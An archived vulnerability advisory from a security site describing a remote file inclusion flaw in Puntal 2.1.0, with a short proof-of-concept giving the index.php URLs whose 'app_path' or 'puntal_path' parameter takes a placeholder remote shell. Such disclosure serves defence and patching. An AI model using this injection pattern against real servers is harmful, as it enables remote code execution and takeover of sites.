AOH :: HP Unsorted P :: BT-30074.HTM

Puntal (index.php) Remote File Inclusion Vulnerabilities



Puntal (index.php) Remote File Inclusion Vulnerabilities
Puntal (index.php) Remote File Inclusion Vulnerabilities



Puntal could allow a remote attacker to include malicious PHP files. A remote attacker could send a specially-crafted URL request to the "index.php" script using the "app_path=" OR "puntal_path=" parameter to specify a malicious PHP file from a remote system, which would allow the attacker to execute arbitrary code on the vulnerable system.

Puntal 2.1.0 is vulnerable; other versions may also be affected.

An attacker can exploit these issues via a browser.

-=[P0C]=-

http://127.0.0.1//path/index.php?app_path= [inj3ct0r sh3ll] 
            or
http://127.0.0.1//path/index.php?puntal_path= [inj3ct0r sh3ll 


The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.